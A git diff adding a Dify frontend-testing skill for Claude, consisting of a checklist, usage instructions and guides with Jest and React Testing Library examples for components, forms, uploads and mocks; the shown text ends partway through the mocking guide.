diff --git a/.claude/skills/frontend-testing/CHECKLIST.md b/.claude/skills/frontend-testing/CHECKLIST.md new file mode 100644 index 0000000000..b960067264 --- /dev/null +++ b/.claude/skills/frontend-testing/CHECKLIST.md @@ -0,0 +1,205 @@ +# Test Generation Checklist + +Use this checklist when generating or reviewing tests for Dify frontend components. + +## Pre-Generation + +- [ ] Read the component source code completely +- [ ] Identify component type (component, hook, utility, page) +- [ ] Run `pnpm analyze-component ` if available +- [ ] Note complexity score and features detected +- [ ] Check for existing tests in the same directory +- [ ] **Identify ALL files in the directory** that need testing (not just index) + +## Testing Strategy + +### ⚠️ Incremental Workflow (CRITICAL for Multi-File) + +- [ ] **NEVER generate all tests at once** - process one file at a time +- [ ] Order files by complexity: utilities → hooks → simple → complex → integration +- [ ] Create a todo list to track progress before starting +- [ ] For EACH file: write → run test → verify pass → then next +- [ ] **DO NOT proceed** to next file until current one passes + +### Path-Level Coverage + +- [ ] **Test ALL files** in the assigned directory/path +- [ ] List all components, hooks, utilities that need coverage +- [ ] Decide: single spec file (integration) or multiple spec files (unit) + +### Complexity Assessment + +- [ ] Run `pnpm analyze-component ` for complexity score +- [ ] **Complexity > 50**: Consider refactoring before testing +- [ ] **500+ lines**: Consider splitting before testing +- [ ] **30-50 complexity**: Use multiple describe blocks, organized structure + +### Integration vs Mocking + +- [ ] **DO NOT mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +- [ ] Import real project components instead of mocking +- [ ] Only mock: API calls, complex context providers, third-party libs with side effects +- [ ] Prefer integration testing when using single spec file + +## Required Test Sections + +### All Components MUST Have + +- [ ] **Rendering tests** - Component renders without crashing +- [ ] **Props tests** - Required props, optional props, default values +- [ ] **Edge cases** - null, undefined, empty values, boundaries + +### Conditional Sections (Add When Feature Present) + +| Feature | Add Tests For | +|---------|---------------| +| `useState` | Initial state, transitions, cleanup | +| `useEffect` | Execution, dependencies, cleanup | +| Event handlers | onClick, onChange, onSubmit, keyboard | +| API calls | Loading, success, error states | +| Routing | Navigation, params, query strings | +| `useCallback`/`useMemo` | Referential equality | +| Context | Provider values, consumer behavior | +| Forms | Validation, submission, error display | + +## Code Quality Checklist + +### Structure + +- [ ] Uses `describe` blocks to group related tests +- [ ] Test names follow `should when ` pattern +- [ ] AAA pattern (Arrange-Act-Assert) is clear +- [ ] Comments explain complex test scenarios + +### Mocks + +- [ ] **DO NOT mock base components** (`@/app/components/base/*`) +- [ ] `jest.clearAllMocks()` in `beforeEach` (not `afterEach`) +- [ ] Shared mock state reset in `beforeEach` +- [ ] i18n uses shared mock (auto-loaded); only override locally for custom translations +- [ ] Router mocks match actual Next.js API +- [ ] Mocks reflect actual component conditional behavior +- [ ] Only mock: API services, complex context providers, third-party libs + +### Queries + +- [ ] Prefer semantic queries (`getByRole`, `getByLabelText`) +- [ ] Use `queryBy*` for absence assertions +- [ ] Use `findBy*` for async elements +- [ ] `getByTestId` only as last resort + +### Async + +- [ ] All async tests use `async/await` +- [ ] `waitFor` wraps async assertions +- [ ] Fake timers properly setup/teardown +- [ ] No floating promises + +### TypeScript + +- [ ] No `any` types without justification +- [ ] Mock data uses actual types from source +- [ ] Factory functions have proper return types + +## Coverage Goals (Per File) + +For the current file being tested: + +- [ ] 100% function coverage +- [ ] 100% statement coverage +- [ ] >95% branch coverage +- [ ] >95% line coverage + +## Post-Generation (Per File) + +**Run these checks after EACH test file, not just at the end:** + +- [ ] Run `pnpm test -- path/to/file.spec.tsx` - **MUST PASS before next file** +- [ ] Fix any failures immediately +- [ ] Mark file as complete in todo list +- [ ] Only then proceed to next file + +### After All Files Complete + +- [ ] Run full directory test: `pnpm test -- path/to/directory/` +- [ ] Check coverage report: `pnpm test -- --coverage` +- [ ] Run `pnpm lint:fix` on all test files +- [ ] Run `pnpm type-check:tsgo` + +## Common Issues to Watch + +### False Positives + +```typescript +// ❌ Mock doesn't match actual behavior +jest.mock('./Component', () => () =>
Mocked
) + +// ✅ Mock matches actual conditional logic +jest.mock('./Component', () => ({ isOpen }: any) => + isOpen ?
Content
: null +) +``` + +### State Leakage + +```typescript +// ❌ Shared state not reset +let mockState = false +jest.mock('./useHook', () => () => mockState) + +// ✅ Reset in beforeEach +beforeEach(() => { + mockState = false +}) +``` + +### Async Race Conditions + +```typescript +// ❌ Not awaited +it('loads data', () => { + render() + expect(screen.getByText('Data')).toBeInTheDocument() +}) + +// ✅ Properly awaited +it('loads data', async () => { + render() + await waitFor(() => { + expect(screen.getByText('Data')).toBeInTheDocument() + }) +}) +``` + +### Missing Edge Cases + +Always test these scenarios: + +- `null` / `undefined` inputs +- Empty strings / arrays / objects +- Boundary values (0, -1, MAX_INT) +- Error states +- Loading states +- Disabled states + +## Quick Commands + +```bash +# Run specific test +pnpm test -- path/to/file.spec.tsx + +# Run with coverage +pnpm test -- --coverage path/to/file.spec.tsx + +# Watch mode +pnpm test -- --watch path/to/file.spec.tsx + +# Update snapshots (use sparingly) +pnpm test -- -u path/to/file.spec.tsx + +# Analyze component +pnpm analyze-component path/to/component.tsx + +# Review existing test +pnpm analyze-component path/to/component.tsx --review +``` diff --git a/.claude/skills/frontend-testing/SKILL.md b/.claude/skills/frontend-testing/SKILL.md new file mode 100644 index 0000000000..06cb672141 --- /dev/null +++ b/.claude/skills/frontend-testing/SKILL.md @@ -0,0 +1,321 @@ +--- +name: Dify Frontend Testing +description: Generate Jest + React Testing Library tests for Dify frontend components, hooks, and utilities. Triggers on testing, spec files, coverage, Jest, RTL, unit tests, integration tests, or write/review test requests. +--- + +# Dify Frontend Testing Skill + +This skill enables Claude to generate high-quality, comprehensive frontend tests for the Dify project following established conventions and best practices. + +> **⚠️ Authoritative Source**: This skill is derived from `web/testing/testing.md`. When in doubt, always refer to that document as the canonical specification. + +## When to Apply This Skill + +Apply this skill when the user: + +- Asks to **write tests** for a component, hook, or utility +- Asks to **review existing tests** for completeness +- Mentions **Jest**, **React Testing Library**, **RTL**, or **spec files** +- Requests **test coverage** improvement +- Uses `pnpm analyze-component` output as context +- Mentions **testing**, **unit tests**, or **integration tests** for frontend code +- Wants to understand **testing patterns** in the Dify codebase + +**Do NOT apply** when: + +- User is asking about backend/API tests (Python/pytest) +- User is asking about E2E tests (Playwright/Cypress) +- User is only asking conceptual questions without code context + +## Quick Reference + +### Tech Stack + +| Tool | Version | Purpose | +|------|---------|---------| +| Jest | 29.7 | Test runner | +| React Testing Library | 16.0 | Component testing | +| happy-dom | - | Test environment | +| nock | 14.0 | HTTP mocking | +| TypeScript | 5.x | Type safety | + +### Key Commands + +```bash +# Run all tests +pnpm test + +# Watch mode +pnpm test -- --watch + +# Run specific file +pnpm test -- path/to/file.spec.tsx + +# Generate coverage report +pnpm test -- --coverage + +# Analyze component complexity +pnpm analyze-component + +# Review existing test +pnpm analyze-component --review +``` + +### File Naming + +- Test files: `ComponentName.spec.tsx` (same directory as component) +- Integration tests: `web/__tests__/` directory + +## Test Structure Template + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import Component from './index' + +// ✅ Import real project components (DO NOT mock these) +// import Loading from '@/app/components/base/loading' +// import { ChildComponent } from './child-component' + +// ✅ Mock external dependencies only +jest.mock('@/service/api') +jest.mock('next/navigation', () => ({ + useRouter: () => ({ push: jest.fn() }), + usePathname: () => '/test', +})) + +// Shared state for mocks (if needed) +let mockSharedState = false + +describe('ComponentName', () => { + beforeEach(() => { + jest.clearAllMocks() // ✅ Reset mocks BEFORE each test + mockSharedState = false // ✅ Reset shared state + }) + + // Rendering tests (REQUIRED) + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange + const props = { title: 'Test' } + + // Act + render() + + // Assert + expect(screen.getByText('Test')).toBeInTheDocument() + }) + }) + + // Props tests (REQUIRED) + describe('Props', () => { + it('should apply custom className', () => { + render() + expect(screen.getByRole('button')).toHaveClass('custom') + }) + }) + + // User Interactions + describe('User Interactions', () => { + it('should handle click events', () => { + const handleClick = jest.fn() + render() + + fireEvent.click(screen.getByRole('button')) + + expect(handleClick).toHaveBeenCalledTimes(1) + }) + }) + + // Edge Cases (REQUIRED) + describe('Edge Cases', () => { + it('should handle null data', () => { + render() + expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + render() + expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + }) +}) +``` + +## Testing Workflow (CRITICAL) + +### ⚠️ Incremental Approach Required + +**NEVER generate all test files at once.** For complex components or multi-file directories: + +1. **Analyze & Plan**: List all files, order by complexity (simple → complex) +1. **Process ONE at a time**: Write test → Run test → Fix if needed → Next +1. **Verify before proceeding**: Do NOT continue to next file until current passes + +``` +For each file: + ┌────────────────────────────────────────┐ + │ 1. Write test │ + │ 2. Run: pnpm test -- .spec.tsx │ + │ 3. PASS? → Mark complete, next file │ + │ FAIL? → Fix first, then continue │ + └────────────────────────────────────────┘ +``` + +### Complexity-Based Order + +Process in this order for multi-file testing: + +1. 🟢 Utility functions (simplest) +1. 🟢 Custom hooks +1. 🟡 Simple components (presentational) +1. 🟡 Medium components (state, effects) +1. 🔴 Complex components (API, routing) +1. 🔴 Integration tests (index files - last) + +### When to Refactor First + +- **Complexity > 50**: Break into smaller pieces before testing +- **500+ lines**: Consider splitting before testing +- **Many dependencies**: Extract logic into hooks first + +> 📖 See `guides/workflow.md` for complete workflow details and todo list format. + +## Testing Strategy + +### Path-Level Testing (Directory Testing) + +When assigned to test a directory/path, test **ALL content** within that path: + +- Test all components, hooks, utilities in the directory (not just `index` file) +- Use incremental approach: one file at a time, verify each before proceeding +- Goal: 100% coverage of ALL files in the directory + +### Integration Testing First + +**Prefer integration testing** when writing tests for a directory: + +- ✅ **Import real project components** directly (including base components and siblings) +- ✅ **Only mock**: API services (`@/service/*`), `next/navigation`, complex context providers +- ❌ **DO NOT mock** base components (`@/app/components/base/*`) +- ❌ **DO NOT mock** sibling/child components in the same directory + +> See [Test Structure Template](#test-structure-template) for correct import/mock patterns. + +## Core Principles + +### 1. AAA Pattern (Arrange-Act-Assert) + +Every test should clearly separate: + +- **Arrange**: Setup test data and render component +- **Act**: Perform user actions +- **Assert**: Verify expected outcomes + +### 2. Black-Box Testing + +- Test observable behavior, not implementation details +- Use semantic queries (getByRole, getByLabelText) +- Avoid testing internal state directly +- **Prefer pattern matching over hardcoded strings** in assertions: + +```typescript +// ❌ Avoid: hardcoded text assertions +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Better: role-based queries +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Better: pattern matching +expect(screen.getByText(/loading/i)).toBeInTheDocument() +``` + +### 3. Single Behavior Per Test + +Each test verifies ONE user-observable behavior: + +```typescript +// ✅ Good: One behavior +it('should disable button when loading', () => { + render( + + + ) + + // Focus should cycle within modal + await user.tab() + expect(screen.getByText('First')).toHaveFocus() + + await user.tab() + expect(screen.getByText('Second')).toHaveFocus() + + await user.tab() + expect(screen.getByText('First')).toHaveFocus() // Cycles back + }) +}) +``` + +## Form Testing + +```typescript +describe('LoginForm', () => { + it('should submit valid form', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn() + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(onSubmit).toHaveBeenCalledWith({ + email: 'test@example.com', + password: 'password123', + }) + }) + + it('should show validation errors', async () => { + const user = userEvent.setup() + + render() + + // Submit empty form + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/email is required/i)).toBeInTheDocument() + expect(screen.getByText(/password is required/i)).toBeInTheDocument() + }) + + it('should validate email format', async () => { + const user = userEvent.setup() + + render() + + await user.type(screen.getByLabelText(/email/i), 'invalid-email') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByText(/invalid email/i)).toBeInTheDocument() + }) + + it('should disable submit button while submitting', async () => { + const user = userEvent.setup() + const onSubmit = jest.fn(() => new Promise(resolve => setTimeout(resolve, 100))) + + render() + + await user.type(screen.getByLabelText(/email/i), 'test@example.com') + await user.type(screen.getByLabelText(/password/i), 'password123') + await user.click(screen.getByRole('button', { name: /sign in/i })) + + expect(screen.getByRole('button', { name: /signing in/i })).toBeDisabled() + + await waitFor(() => { + expect(screen.getByRole('button', { name: /sign in/i })).toBeEnabled() + }) + }) +}) +``` + +## Data-Driven Tests with test.each + +```typescript +describe('StatusBadge', () => { + test.each([ + ['success', 'bg-green-500'], + ['warning', 'bg-yellow-500'], + ['error', 'bg-red-500'], + ['info', 'bg-blue-500'], + ])('should apply correct class for %s status', (status, expectedClass) => { + render() + + expect(screen.getByTestId('status-badge')).toHaveClass(expectedClass) + }) + + test.each([ + { input: null, expected: 'Unknown' }, + { input: undefined, expected: 'Unknown' }, + { input: '', expected: 'Unknown' }, + { input: 'invalid', expected: 'Unknown' }, + ])('should show "Unknown" for invalid input: $input', ({ input, expected }) => { + render() + + expect(screen.getByText(expected)).toBeInTheDocument() + }) +}) +``` + +## Debugging Tips + +```typescript +// Print entire DOM +screen.debug() + +// Print specific element +screen.debug(screen.getByRole('button')) + +// Log testing playground URL +screen.logTestingPlaygroundURL() + +// Pretty print DOM +import { prettyDOM } from '@testing-library/react' +console.log(prettyDOM(screen.getByRole('dialog'))) + +// Check available roles +import { getRoles } from '@testing-library/react' +console.log(getRoles(container)) +``` + +## Common Mistakes to Avoid + +### ❌ Don't Use Implementation Details + +```typescript +// Bad - testing implementation +expect(component.state.isOpen).toBe(true) +expect(wrapper.find('.internal-class').length).toBe(1) + +// Good - testing behavior +expect(screen.getByRole('dialog')).toBeInTheDocument() +``` + +### ❌ Don't Forget Cleanup + +```typescript +// Bad - may leak state between tests +it('test 1', () => { + render() +}) + +// Good - cleanup is automatic with RTL, but reset mocks +beforeEach(() => { + jest.clearAllMocks() +}) +``` + +### ❌ Don't Use Exact String Matching (Prefer Black-Box Assertions) + +```typescript +// ❌ Bad - hardcoded strings are brittle +expect(screen.getByText('Submit Form')).toBeInTheDocument() +expect(screen.getByText('Loading...')).toBeInTheDocument() + +// ✅ Good - role-based queries (most semantic) +expect(screen.getByRole('button', { name: /submit/i })).toBeInTheDocument() +expect(screen.getByRole('status')).toBeInTheDocument() + +// ✅ Good - pattern matching (flexible) +expect(screen.getByText(/submit/i)).toBeInTheDocument() +expect(screen.getByText(/loading/i)).toBeInTheDocument() + +// ✅ Good - test behavior, not exact UI text +expect(screen.getByRole('button')).toBeDisabled() +expect(screen.getByRole('alert')).toBeInTheDocument() +``` + +**Why prefer black-box assertions?** + +- Text content may change (i18n, copy updates) +- Role-based queries test accessibility +- Pattern matching is resilient to minor changes +- Tests focus on behavior, not implementation details + +### ❌ Don't Assert on Absence Without Query + +```typescript +// Bad - throws if not found +expect(screen.getByText('Error')).not.toBeInTheDocument() // Error! + +// Good - use queryBy for absence assertions +expect(screen.queryByText('Error')).not.toBeInTheDocument() +``` diff --git a/.claude/skills/frontend-testing/guides/domain-components.md b/.claude/skills/frontend-testing/guides/domain-components.md new file mode 100644 index 0000000000..ed2cc6eb8a --- /dev/null +++ b/.claude/skills/frontend-testing/guides/domain-components.md @@ -0,0 +1,523 @@ +# Domain-Specific Component Testing + +This guide covers testing patterns for Dify's domain-specific components. + +## Workflow Components (`workflow/`) + +Workflow components handle node configuration, data flow, and graph operations. + +### Key Test Areas + +1. **Node Configuration** +1. **Data Validation** +1. **Variable Passing** +1. **Edge Connections** +1. **Error Handling** + +### Example: Node Configuration Panel + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import NodeConfigPanel from './node-config-panel' +import { createMockNode, createMockWorkflowContext } from '@/__mocks__/workflow' + +// Mock workflow context +jest.mock('@/app/components/workflow/hooks', () => ({ + useWorkflowStore: () => mockWorkflowStore, + useNodesInteractions: () => mockNodesInteractions, +})) + +let mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), +} + +let mockNodesInteractions = { + handleNodeSelect: jest.fn(), + handleNodeDelete: jest.fn(), +} + +describe('NodeConfigPanel', () => { + beforeEach(() => { + jest.clearAllMocks() + mockWorkflowStore = { + nodes: [], + edges: [], + updateNode: jest.fn(), + } + }) + + describe('Node Configuration', () => { + it('should render node type selector', () => { + const node = createMockNode({ type: 'llm' }) + render() + + expect(screen.getByLabelText(/model/i)).toBeInTheDocument() + }) + + it('should update node config on change', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + await user.selectOptions(screen.getByLabelText(/model/i), 'gpt-4') + + expect(mockWorkflowStore.updateNode).toHaveBeenCalledWith( + node.id, + expect.objectContaining({ model: 'gpt-4' }) + ) + }) + }) + + describe('Data Validation', () => { + it('should show error for invalid input', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'code' }) + + render() + + // Enter invalid code + const codeInput = screen.getByLabelText(/code/i) + await user.clear(codeInput) + await user.type(codeInput, 'invalid syntax {{{') + + await waitFor(() => { + expect(screen.getByText(/syntax error/i)).toBeInTheDocument() + }) + }) + + it('should validate required fields', async () => { + const node = createMockNode({ type: 'http', data: { url: '' } }) + + render() + + fireEvent.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/url is required/i)).toBeInTheDocument() + }) + }) + }) + + describe('Variable Passing', () => { + it('should display available variables from upstream nodes', () => { + const upstreamNode = createMockNode({ + id: 'node-1', + type: 'start', + data: { outputs: [{ name: 'user_input', type: 'string' }] }, + }) + const currentNode = createMockNode({ + id: 'node-2', + type: 'llm', + }) + + mockWorkflowStore.nodes = [upstreamNode, currentNode] + mockWorkflowStore.edges = [{ source: 'node-1', target: 'node-2' }] + + render() + + // Variable selector should show upstream variables + fireEvent.click(screen.getByRole('button', { name: /add variable/i })) + + expect(screen.getByText('user_input')).toBeInTheDocument() + }) + + it('should insert variable into prompt template', async () => { + const user = userEvent.setup() + const node = createMockNode({ type: 'llm' }) + + render() + + // Click variable button + await user.click(screen.getByRole('button', { name: /insert variable/i })) + await user.click(screen.getByText('user_input')) + + const promptInput = screen.getByLabelText(/prompt/i) + expect(promptInput).toHaveValue(expect.stringContaining('{{user_input}}')) + }) + }) +}) +``` + +## Dataset Components (`dataset/`) + +Dataset components handle file uploads, data display, and search/filter operations. + +### Key Test Areas + +1. **File Upload** +1. **File Type Validation** +1. **Pagination** +1. **Search & Filtering** +1. **Data Format Handling** + +### Example: Document Uploader + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import DocumentUploader from './document-uploader' + +jest.mock('@/service/datasets', () => ({ + uploadDocument: jest.fn(), + parseDocument: jest.fn(), +})) + +import * as datasetService from '@/service/datasets' +const mockedService = datasetService as jest.Mocked + +describe('DocumentUploader', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + describe('File Upload', () => { + it('should accept valid file types', async () => { + const user = userEvent.setup() + const onUpload = jest.fn() + mockedService.uploadDocument.mockResolvedValue({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + await waitFor(() => { + expect(mockedService.uploadDocument).toHaveBeenCalledWith( + expect.any(FormData) + ) + }) + }) + + it('should reject invalid file types', async () => { + const user = userEvent.setup() + + render() + + const file = new File(['content'], 'test.exe', { type: 'application/x-msdownload' }) + const input = screen.getByLabelText(/upload/i) + + await user.upload(input, file) + + expect(screen.getByText(/unsupported file type/i)).toBeInTheDocument() + expect(mockedService.uploadDocument).not.toHaveBeenCalled() + }) + + it('should show upload progress', async () => { + const user = userEvent.setup() + + // Mock upload with progress + mockedService.uploadDocument.mockImplementation(() => { + return new Promise((resolve) => { + setTimeout(() => resolve({ id: 'doc-1' }), 100) + }) + }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + expect(screen.getByRole('progressbar')).toBeInTheDocument() + + await waitFor(() => { + expect(screen.queryByRole('progressbar')).not.toBeInTheDocument() + }) + }) + }) + + describe('Error Handling', () => { + it('should handle upload failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument.mockRejectedValue(new Error('Upload failed')) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByText(/upload failed/i)).toBeInTheDocument() + }) + }) + + it('should allow retry after failure', async () => { + const user = userEvent.setup() + mockedService.uploadDocument + .mockRejectedValueOnce(new Error('Network error')) + .mockResolvedValueOnce({ id: 'doc-1' }) + + render() + + const file = new File(['content'], 'test.pdf', { type: 'application/pdf' }) + await user.upload(screen.getByLabelText(/upload/i), file) + + await waitFor(() => { + expect(screen.getByRole('button', { name: /retry/i })).toBeInTheDocument() + }) + + await user.click(screen.getByRole('button', { name: /retry/i })) + + await waitFor(() => { + expect(screen.getByText(/uploaded successfully/i)).toBeInTheDocument() + }) + }) + }) +}) +``` + +### Example: Document List with Pagination + +```typescript +describe('DocumentList', () => { + describe('Pagination', () => { + it('should load first page on mount', async () => { + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + expect(mockedService.getDocuments).toHaveBeenCalledWith('ds-1', { page: 1 }) + }) + + it('should navigate to next page', async () => { + const user = userEvent.setup() + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '1', name: 'Doc 1' }], + total: 50, + page: 1, + pageSize: 10, + }) + + render() + + await waitFor(() => { + expect(screen.getByText('Doc 1')).toBeInTheDocument() + }) + + mockedService.getDocuments.mockResolvedValue({ + data: [{ id: '11', name: 'Doc 11' }], + total: 50, + page: 2, + pageSize: 10, + }) + + await user.click(screen.getByRole('button', { name: /next/i })) + + await waitFor(() => { + expect(screen.getByText('Doc 11')).toBeInTheDocument() + }) + }) + }) + + describe('Search & Filtering', () => { + it('should filter by search query', async () => { + const user = userEvent.setup() + jest.useFakeTimers() + + render() + + await user.type(screen.getByPlaceholderText(/search/i), 'test query') + + // Debounce + jest.advanceTimersByTime(300) + + await waitFor(() => { + expect(mockedService.getDocuments).toHaveBeenCalledWith( + 'ds-1', + expect.objectContaining({ search: 'test query' }) + ) + }) + + jest.useRealTimers() + }) + }) +}) +``` + +## Configuration Components (`app/configuration/`, `config/`) + +Configuration components handle forms, validation, and data persistence. + +### Key Test Areas + +1. **Form Validation** +1. **Save/Reset** +1. **Required vs Optional Fields** +1. **Configuration Persistence** +1. **Error Feedback** + +### Example: App Configuration Form + +```typescript +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +import AppConfigForm from './app-config-form' + +jest.mock('@/service/apps', () => ({ + updateAppConfig: jest.fn(), + getAppConfig: jest.fn(), +})) + +import * as appService from '@/service/apps' +const mockedService = appService as jest.Mocked + +describe('AppConfigForm', () => { + const defaultConfig = { + name: 'My App', + description: '', + icon: 'default', + openingStatement: '', + } + + beforeEach(() => { + jest.clearAllMocks() + mockedService.getAppConfig.mockResolvedValue(defaultConfig) + }) + + describe('Form Validation', () => { + it('should require app name', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Clear name field + await user.clear(screen.getByLabelText(/name/i)) + await user.click(screen.getByRole('button', { name: /save/i })) + + expect(screen.getByText(/name is required/i)).toBeInTheDocument() + expect(mockedService.updateAppConfig).not.toHaveBeenCalled() + }) + + it('should validate name length', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toBeInTheDocument() + }) + + // Enter very long name + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'a'.repeat(101)) + + expect(screen.getByText(/name must be less than 100 characters/i)).toBeInTheDocument() + }) + + it('should allow empty optional fields', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Leave description empty (optional) + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalled() + }) + }) + }) + + describe('Save/Reset Functionality', () => { + it('should save configuration', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockResolvedValue({ success: true }) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Updated App') + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(mockedService.updateAppConfig).toHaveBeenCalledWith( + 'app-1', + expect.objectContaining({ name: 'Updated App' }) + ) + }) + + expect(screen.getByText(/saved successfully/i)).toBeInTheDocument() + }) + + it('should reset to default values', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.clear(screen.getByLabelText(/name/i)) + await user.type(screen.getByLabelText(/name/i), 'Changed Name') + + // Reset + await user.click(screen.getByRole('button', { name: /reset/i })) + + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + it('should show unsaved changes warning', async () => { + const user = userEvent.setup() + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + // Make changes + await user.type(screen.getByLabelText(/name/i), ' Updated') + + expect(screen.getByText(/unsaved changes/i)).toBeInTheDocument() + }) + }) + + describe('Error Handling', () => { + it('should show error on save failure', async () => { + const user = userEvent.setup() + mockedService.updateAppConfig.mockRejectedValue(new Error('Server error')) + + render() + + await waitFor(() => { + expect(screen.getByLabelText(/name/i)).toHaveValue('My App') + }) + + await user.click(screen.getByRole('button', { name: /save/i })) + + await waitFor(() => { + expect(screen.getByText(/failed to save/i)).toBeInTheDocument() + }) + }) + }) +}) +``` diff --git a/.claude/skills/frontend-testing/guides/mocking.md b/.claude/skills/frontend-testing/guides/mocking.md new file mode 100644 index 0000000000..bf0bd79690 --- /dev/null +++ b/.claude/skills/frontend-testing/guides/mocking.md @@ -0,0 +1,363 @@ +# Mocking Guide for Dify Frontend Tests + +## ⚠️ Important: What NOT to Mock + +### DO NOT Mock Base Components + +**Never mock components from `@/app/components/base/`** such as: + +- `Loading`, `Spinner` +- `Button`, `Input`, `Select` +- `Tooltip`, `Modal`, `Dropdown` +- `Icon`, `Badge`, `Tag` + +**Why?** + +- Base components will have their own dedicated tests +- Mocking them creates false positives (tests pass but real integration fails) +- Using real components tests actual integration behavior + +```typescript +// ❌ WRONG: Don't mock base components +jest.mock('@/app/components/base/loading', () => () =>
Loading
) +jest.mock('@/app/components/base/button', () => ({ children }: any) => ) + +// ✅ CORRECT: Import and use real base components +import Loading from '@/app/components/base/loading' +import Button from '@/app/components/base/button' +// They will render normally in tests +``` + +### What TO Mock + +Only mock these categories: + +1. **API services** (`@/service/*`) - Network calls +1. **Complex context providers** - When setup is too difficult +1. **Third-party libraries with side effects** - `next/navigation`, external SDKs +1. **i18n** - Always mock to return keys + +## Mock Placement + +| Location | Purpose | +|----------|---------| +| `web/__mocks__/` | Reusable mocks shared across multiple test files | +| Test file | Test-specific mocks, inline with `jest.mock()` | + +## Essential Mocks + +### 1. i18n (Auto-loaded via Shared Mock) + +A shared mock is available at `web/__mocks__/react-i18next.ts` and is auto-loaded by Jest. +**No explicit mock needed** for most tests - it returns translation keys as-is. + +For tests requiring custom translations, override the mock: + +```typescript +jest.mock('react-i18next', () => ({ + useTranslation: () => ({ + t: (key: string) => { + const translations: Record = { + 'my.custom.key': 'Custom translation', + } + return translations[key] || key + }, + }), +})) +``` + +### 2. Next.js Router + +```typescript +const mockPush = jest.fn() +const mockReplace = jest.fn() + +jest.mock('next/navigation', () => ({ + useRouter: () => ({ + push: mockPush, + replace: mockReplace, + back: jest.fn(), + prefetch: jest.fn(), + }), + usePathname: () => '/current-path', + useSearchParams: () => new URLSearchParams('?key=value'), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + it('should navigate on click', () => { + render() + fireEvent.click(screen.getByRole('button')) + expect(mockPush).toHaveBeenCalledWith('/expected-path') + }) +}) +``` + +### 3. Portal Components (with Shared State) + +```typescript +// ⚠️ Important: Use shared state for components that depend on each other +let mockPortalOpenState = false + +jest.mock('@/app/components/base/portal-to-follow-elem', () => ({ + PortalToFollowElem: ({ children, open, ...props }: any) => { + mockPortalOpenState = open || false // Update shared state + return
{children}
+ }, + PortalToFollowElemContent: ({ children }: any) => { + // ✅ Matches actual: returns null when portal is closed + if (!mockPortalOpenState) return null + return
{children}
+ }, + PortalToFollowElemTrigger: ({ children }: any) => ( +
{children}
